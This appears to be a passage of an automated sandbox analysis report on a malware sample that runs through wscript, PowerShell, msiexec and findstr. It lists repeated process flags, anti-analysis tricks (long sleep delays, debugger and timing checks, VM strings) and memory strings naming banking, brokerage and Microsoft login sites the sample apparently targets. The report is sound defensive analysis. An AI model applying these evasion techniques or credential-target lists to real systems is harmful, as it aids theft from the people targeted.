              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: Initial fileInitial file: Do While Designfasens73.Status = 0 WScript.Sleep 100
              Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF84F7AD324
              Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF84F7AD944
              Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF84F7AD504
              Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF84F7AD544
              Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF84F7AD1E4
              Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF84F7B0154
              Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF84F7ADA44
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7BBA0 rdtsc 16_2_02E7BBA0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4496Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5406Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8559Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1050Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.5 %
              Source: C:\Windows\SysWOW64\findstr.exeAPI coverage: 2.8 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4388Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1652Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_003CC830 FindFirstFileW,FindNextFileW,FindClose,16_2_003CC830
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: findstr.exe, 00000010.00000002.2576008459.00000000078CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,1169642
              Source: 5c0G518.16.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: findstr.exe, 00000010.00000002.2572965729.000000000088D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
              Source: 5c0G518.16.drBinary or memory string: discord.comVMware20,11696428655f
              Source: 5c0G518.16.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: 5c0G518.16.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: 5c0G518.16.drBinary or memory string: global block list test formVMware20,11696428655
              Source: 5c0G518.16.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: msiexec.exe, 0000000D.00000003.2129654371.0000000003F45000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2235455301.0000000003F45000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2235388323.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: 5c0G518.16.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: 5c0G518.16.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: 5c0G518.16.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: findstr.exe, 00000010.00000002.2576008459.00000000078CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: entralVMware20,1
              Source: 5c0G518.16.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: 5c0G518.16.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: 5c0G518.16.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: 5c0G518.16.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: 5c0G518.16.drBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: 5c0G518.16.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: PING.EXE, 00000002.00000002.1292323880.000001F168059000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1567844789.0000022E7621F000.00000004.00000020.00020000.00000000.sdmp, mAV1geIoraZWu3gOV6nu2g.exe, 0000000E.00000002.2573392384.0000000000D19000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2535133840.000002333066C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: 5c0G518.16.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: 5c0G518.16.drBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: 5c0G518.16.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: 5c0G518.16.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: findstr.exe, 00000010.00000002.2576008459.00000000078CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kers.comVMware20
              Source: findstr.exe, 00000010.00000002.2576008459.00000000078CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: merica.comVMware
              Source: 5c0G518.16.drBinary or memory string: AMC password management pageVMware20,11696428655
              Source: 5c0G518.16.drBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: 5c0G518.16.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: 5c0G518.16.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: 5c0G518.16.drBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: 5c0G518.16.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: 5c0G518.16.drBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: 5c0G518.16.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: 5c0G518.16.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: findstr.exe, 00000010.00000002.2576008459.00000000078CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ca.comVMware20,1
              Source: 5c0G518.16.drBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: 5c0G518.16.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: 5c0G518.16.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7BBA0 rdtsc 16_2_02E7BBA0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FAC2DF0 NtQuerySystemInformation,LdrInitializeThunk,13_2_1FAC2DF0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FAC1FB8 mov eax, dword ptr fs:[00000030h]13_2_1FAC1FB8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FABBFB0 mov eax, dword ptr fs:[00000030h]13_2_1FABBFB0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FABCF80 mov eax, dword ptr fs:[00000030h]13_2_1FABCF80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FAB2F98 mov eax, dword ptr fs:[00000030h]13_2_1FAB2F98
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FAB2F98 mov eax, dword ptr fs:[00000030h]13_2_1FAB2F98
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA7FF90 mov edi, dword ptr fs:[00000030h]13_2_1FA7FF90
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA91F92 mov ecx, dword ptr fs:[00000030h]13_2_1FA91F92
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA91F92 mov ecx, dword ptr fs:[00000030h]13_2_1FA91F92
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA91F92 mov eax, dword ptr fs:[00000030h]13_2_1FA91F92
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA91F92 mov ecx, dword ptr fs:[00000030h]13_2_1FA91F92
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA91F92 mov ecx, dword ptr fs:[00000030h]13_2_1FA91F92
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA91F92 mov eax, dword ptr fs:[00000030h]13_2_1FA91F92
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA91F92 mov ecx, dword ptr fs:[00000030h]13_2_1FA91F92
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA91F92 mov ecx, dword ptr fs:[00000030h]13_2_1FA91F92
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA91F92 mov eax, dword ptr fs:[00000030h]13_2_1FA91F92
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA91F92 mov ecx, dword ptr fs:[00000030h]13_2_1FA91F92
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA91F92 mov ecx, dword ptr fs:[00000030h]13_2_1FA91F92
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA91F92 mov eax, dword ptr fs:[00000030h]13_2_1FA91F92
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FB36FF7 mov eax, dword ptr fs:[00000030h]13_2_1FB36FF7
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FABBFEC mov eax, dword ptr fs:[00000030h]13_2_1FABBFEC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FABBFEC mov eax, dword ptr fs:[00000030h]13_2_1FABBFEC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FABBFEC mov eax, dword ptr fs:[00000030h]13_2_1FABBFEC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA9CFE0 mov eax, dword ptr fs:[00000030h]13_2_1FA9CFE0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA9CFE0 mov eax, dword ptr fs:[00000030h]13_2_1FA9CFE0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FB54FE7 mov eax, dword ptr fs:[00000030h]13_2_1FB54FE7
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FAC0FF6 mov eax, dword ptr fs:[00000030h]13_2_1FAC0FF6
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FAC0FF6 mov eax, dword ptr fs:[00000030h]13_2_1FAC0FF6
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FAC0FF6 mov eax, dword ptr fs:[00000030h]13_2_1FAC0FF6
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FAC0FF6 mov eax, dword ptr fs:[00000030h]13_2_1FAC0FF6
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA82FC8 mov eax, dword ptr fs:[00000030h]13_2_1FA82FC8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA82FC8 mov eax, dword ptr fs:[00000030h]13_2_1FA82FC8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA82FC8 mov eax, dword ptr fs:[00000030h]13_2_1FA82FC8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA82FC8 mov eax, dword ptr fs:[00000030h]13_2_1FA82FC8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FAB1FCD mov eax, dword ptr fs:[00000030h]13_2_1FAB1FCD
